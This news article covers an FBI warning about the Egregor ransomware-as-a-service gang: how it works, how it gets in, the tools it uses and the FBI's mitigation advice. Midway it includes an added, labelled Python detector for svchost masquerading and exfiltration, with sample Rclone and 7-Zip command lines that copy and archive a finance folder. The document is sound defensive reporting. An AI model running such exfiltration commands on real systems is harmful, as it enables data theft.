The FBI warns that the Egregor ransomware gang is actively targeting and extorting businesses around the world. In an announcement released on January 6, the Bureau states that Egregor claims more than 150 victims since September 2020, when it began its malicious activity.
Egregor is a Ransomware-as-a-Service operation that works with affiliates who breach networks and deploy the ransomware payload. The affiliates then share the ransom payments with the Egregor operators on a 70/30 split. After infiltrating a victim's network, they steal files before encrypting devices and then use the stolen data to threaten victims with a leak if they refuse to pay the demanded ransom.
According to BleepingComputer, Egregor began operations at the same time as the Maze gang shut down its own, and many Maze members moved over to the Egregor operation.
The FBI's notice to businesses states the following: "Because of the large number of actors involved in deploying Egregor, the tactics, techniques and procedures (TTPs) used to deploy it can vary widely, creating significant challenges for defense and mitigation." It adds that "Egregor ransomware uses many mechanisms to breach corporate networks, including targeting the corporate networks and personal accounts of employees who share access to corporate networks or devices."
In addition, phishing emails with malicious attachments and insecure Remote Desktop Protocol (RDP) or VPN access are among the vectors Egregor operators use to gain access to and move laterally within their victims' networks. Egregor also uses Cobalt Strike, Qakbot/Qbot, Advanced IP Scanner and AdFind for privilege escalation and lateral movement inside target networks. The gang's affiliates also use 7zip and Rclone, sometimes disguised as a Service Host (svchost) process, to exfiltrate data before deploying the ransomware payload on the victim's network.
The FBI has also released a list of recommended measures to help businesses strengthen their defenses against Egregor attacks:
- Back up critical data offline.
- Make sure copies of critical data are in the cloud or on an external hard drive or storage device.
- Secure your backups and make sure the data cannot be modified or deleted from the system where it resides.
- Install and regularly update antivirus or anti-malware software on all servers.
- Use only secure networks and avoid using public Wi-Fi networks.
- Use two-factor authentication (2FA) and do not click on unsolicited attachments or links in emails.
- Prioritize patching of remote-access products and applications, including recent RDP vulnerabilities (CVE-2020-0609, CVE-2020-0610, CVE-2020-16896, CVE-2019-1489, CVE-2019-1225, CVE-2019-1224, CVE-2019-1108).
- Check for suspicious .bat and .dll files, files containing reconnaissance data (such as .log files), and exfiltration tools.
- Configure RDP securely by restricting access and requiring multi-factor authentication (MFA) or strong passwords.
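As an added defender-side example (not part of the FBI notice or of this article), the svchost masquerading and 7zip/Rclone exfiltration pattern described above, together with the recommendation to check for exfiltration tools, can be expressed as heuristics run over a process snapshot. The record format, the sample entries and the heuristics are assumptions made for illustration, not FBI-published indicators.

```python
from __future__ import annotations
import re

# Constructed process snapshot (image name, image path, command line), as an
# EDR or Sysmon process-creation feed would provide. All values are made up.
SAMPLE_PROCESSES = [
    ("svchost.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p"),
    ("svchost.exe", r"C:\Users\Public\svchost.exe",
     r"svchost.exe copy C:\Finance gdrive:backup --transfers 8"),
    ("7z.exe", r"C:\Users\Public\tools\7z.exe",
     r"7z.exe a -pS3cret -mhe=on C:\staging\out.7z C:\Finance"),
    ("7z.exe", r"C:\Program Files\7-Zip\7z.exe", r"7z.exe x C:\Downloads\setup.7z"),
]

# Genuine svchost.exe only runs from these two directories.
SVCHOST_DIRS = ("c:/windows/system32/", "c:/windows/syswow64/")
# An archiver or sync tool launched from here was staged, not installed.
USER_WRITABLE = ("c:/users/", "c:/programdata/", "c:/windows/temp/")
EXFIL_TOOLS = {"rclone.exe", "7z.exe", "7za.exe"}
# rclone transfer verb followed by a "<remote>:<path>" target; requiring a
# remote name of 2+ characters keeps single-letter drive paths from matching.
RCLONE_CMD = re.compile(r"\b(copy|sync|move)\b.*\s[A-Za-z0-9_-]{2,}:\S*", re.I)
# 7-Zip "add" with a -p<password> switch (header encryption hides file names).
ARCHIVE_CMD = re.compile(r"\b7za?(?:\.exe)?\s+a\s+.*-p\S+", re.I)


def _norm(path: str) -> str:
    return path.replace("\\", "/").lower()


def assess_process(image_name: str, image_path: str, command_line: str) -> list[str]:
    """Return the heuristic tags that fire for one process record."""
    name, path, tags = image_name.lower(), _norm(image_path), []
    if name == "svchost.exe" and not path.startswith(SVCHOST_DIRS):
        tags.append("svchost_masquerade")
    if name in EXFIL_TOOLS and path.startswith(USER_WRITABLE):
        tags.append("tool_in_user_writable_path")
    if RCLONE_CMD.search(command_line):
        tags.append("rclone_remote_transfer")
    if ARCHIVE_CMD.search(command_line):
        tags.append("password_protected_archive")
    return tags


def scan(snapshot) -> list[tuple[str, list[str]]]:
    """Return (command line, tags) for every record that triggers a heuristic."""
    hits = []
    for name, path, cmdline in snapshot:
        tags = assess_process(name, path, cmdline)
        if tags:
            hits.append((cmdline, tags))
    return hits
```

The two legitimate records (System32 svchost and the installed 7-Zip extracting an archive) produce no tags; the staged copies are flagged on both their location and their command lines.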
Since September 2020, Egregor affiliates have breached and encrypted the systems of many high-profile companies, including Ubisoft, Kmart, Randstad, Barnes & Noble, Cencosud, Crytek and Vancouver's TransLink.
Victims are also advised not to pay the ransom, since payment does not guarantee recovery of the encrypted data and it funds future criminal operations, encouraging further attacks. The FBI also urges victims to report ransomware incidents to help investigators identify the threat actors behind them and prevent future attacks.